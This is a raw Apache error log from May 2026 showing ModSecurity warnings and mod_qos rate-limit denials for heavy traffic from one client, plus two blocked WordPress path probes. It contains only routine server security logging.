[Tue May 26 20:00:34.309755 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iSQAAAN0"]
[Tue May 26 20:00:34.328388 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFtAAAAGc"]
[Tue May 26 20:00:34.336636 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iTgAAAOU"]
[Tue May 26 20:00:34.339459 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iRQAAAKc"]
[Tue May 26 20:00:34.342963 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1idwAAAMQ"]
[Tue May 26 20:00:34.347494 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1icgAAAKE"]
[Tue May 26 20:00:34.352702 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ifQAAAQQ"]
[Tue May 26 20:00:34.353854 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFqwAAAAg"]
[Tue May 26 20:00:34.353890 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFsAAAAEw"]
[Tue May 26 20:00:34.361858 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ifwAAAO8"]
[Tue May 26 20:00:34.365802 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFswAAAF8"]
[Tue May 26 20:00:34.371556 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFtwAAAG0"]
[Tue May 26 20:00:34.379512 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iUQAAAL0"]
[Tue May 26 20:00:34.391909 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswFzQAAAGY"]
[Tue May 26 20:00:34.403308 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF0QAAAHs"]
[Tue May 26 20:00:34.404116 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ihQAAAIo"]
[Tue May 26 20:00:34.405271 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1iigAAANU"]
[Tue May 26 20:00:34.413431 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFuQAAADw"]
[Tue May 26 20:00:34.416993 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1iiAAAAMc"]
[Tue May 26 20:00:34.422500 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ijAAAAPs"]
[Tue May 26 20:00:34.425616 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ifgAAAOA"]
[Tue May 26 20:00:34.428889 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ihgAAAPA"]
[Tue May 26 20:00:34.432937 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF3QAAAFw"]
[Tue May 26 20:00:34.575516 2026] [security2:error] [pid 93576:tid 93823] [client 103.163.220.22:50493] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/packed.php"] [unique_id "ahWuimDRMqfxdEDkoswGUgAAAG8"]
[Tue May 26 20:00:34.747698 2026] [qos:error] [pid 106517:tid 106697] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuioZZc2DoU1lPnP1i5wAAALM
[Tue May 26 20:00:34.747780 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuioZZc2DoU1lPnP1i6AAAANw
[Tue May 26 20:00:34.747862 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuioZZc2DoU1lPnP1i5gAAALw
[Tue May 26 20:00:34.748789 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGfwAAAAU
[Tue May 26 20:00:34.749874 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGgQAAAAU
[Tue May 26 20:00:34.750493 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuioZZc2DoU1lPnP1i6gAAAPM
[Tue May 26 20:00:34.750682 2026] [qos:error] [pid 106517:tid 106679] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuioZZc2DoU1lPnP1i7QAAAKE
[Tue May 26 20:00:34.752837 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGggAAAAo
[Tue May 26 20:00:34.754527 2026] [qos:error] [pid 106517:tid 106703] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuioZZc2DoU1lPnP1i8QAAALk
[Tue May 26 20:00:34.756205 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuimDRMqfxdEDkoswGhAAAADg
[Tue May 26 20:00:34.896504 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGiwAAAC8
[Tue May 26 20:00:34.899280 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGjAAAAAI
[Tue May 26 20:00:34.900469 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuioZZc2DoU1lPnP1i9wAAANk
[Tue May 26 20:00:34.900712 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGjQAAAGI
[Tue May 26 20:00:34.901222 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGjgAAAB0
[Tue May 26 20:00:34.902089 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuioZZc2DoU1lPnP1i-AAAAM8
[Tue May 26 20:00:34.904510 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGjwAAAFs
[Tue May 26 20:00:34.907883 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGkAAAADE
[Tue May 26 20:00:34.909765 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuioZZc2DoU1lPnP1i-QAAAIo
[Tue May 26 20:00:34.910427 2026] [qos:error] [pid 106517:tid 106655] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuioZZc2DoU1lPnP1i-gAAAIo
[Tue May 26 20:00:35.044818 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGkwAAABE
[Tue May 26 20:00:35.046817 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGlAAAACk
[Tue May 26 20:00:35.047730 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1i_AAAAOo
[Tue May 26 20:00:35.051190 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGlQAAAAI
[Tue May 26 20:00:35.053350 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGlgAAAB0
[Tue May 26 20:00:35.056728 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGmAAAADE
[Tue May 26 20:00:35.058944 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1i_QAAANU
[Tue May 26 20:00:35.059471 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGmgAAAAo
[Tue May 26 20:00:35.064075 2026] [qos:error] [pid 106517:tid 106649] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1i_gAAAIU
[Tue May 26 20:00:35.065684 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1i_wAAANs
[Tue May 26 20:00:35.066567 2026] [security2:error] [pid 106517:tid 106694] [client 103.163.220.47:33269] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/code/"] [unique_id "ahWui4ZZc2DoU1lPnP1jAAAAALA"]
[Tue May 26 20:00:35.264081 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jBAAAAJc
[Tue May 26 20:00:35.264199 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGoQAAAA8
[Tue May 26 20:00:35.264390 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGogAAACk
[Tue May 26 20:00:35.270294 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGpAAAAAI
[Tue May 26 20:00:35.271041 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGpgAAAHI
[Tue May 26 20:00:35.273205 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui2DRMqfxdEDkoswGpwAAABY
[Tue May 26 20:00:35.275438 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jBQAAAMs
[Tue May 26 20:00:35.277191 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF3wAAABc"]
[Tue May 26 20:00:35.279814 2026] [qos:error] [pid 106517:tid 106709] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWui4ZZc2DoU1lPnP1jBwAAAL8
[Tue May 26 20:00:35.280286 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF-gAAAC4"]
[Tue May 26 20:00:35.283552 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1igAAAAJQ"]
[Tue May 26 20:00:35.286081 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF4wAAAFU"]
[Tue May 26 20:00:35.286444 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiYZZc2DoU1lPnP1ikAAAAKA"]
[Tue May 26 20:00:35.290771 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF5gAAABk"]
[Tue May 26 20:00:35.304850 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF6gAAADU"]
[Tue May 26 20:00:35.311924 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF5QAAAHM"]
[Tue May 26 20:00:35.315982 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF7QAAABI"]
[Tue May 26 20:00:35.329142 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF9gAAAEQ"]
[Tue May 26 20:00:35.335180 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswGBgAAAG4"]
[Tue May 26 20:00:35.341921 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF9QAAAH4"]
[Tue May 26 20:00:35.343600 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF_QAAAA0"]
[Tue May 26 20:00:35.347723 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF_AAAAHQ"]
[Tue May 26 20:00:35.355382 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswGBQAAADk"]
[Tue May 26 20:00:35.356259 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF_gAAAGg"]
[Tue May 26 20:00:35.359405 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGRQAAAF4"]
[Tue May 26 20:00:35.367470 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswGDQAAAGM"]
[Tue May 26 20:00:35.368220 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswGEgAAACg"]
[Tue May 26 20:00:35.377310 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGRAAAAGU"]
[Tue May 26 20:00:35.382301 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGUAAAACA"]
[Tue May 26 20:00:35.387814 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswF_wAAAGA"]
[Tue May 26 20:00:35.399353 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuimDRMqfxdEDkoswGZQAAAHY"]
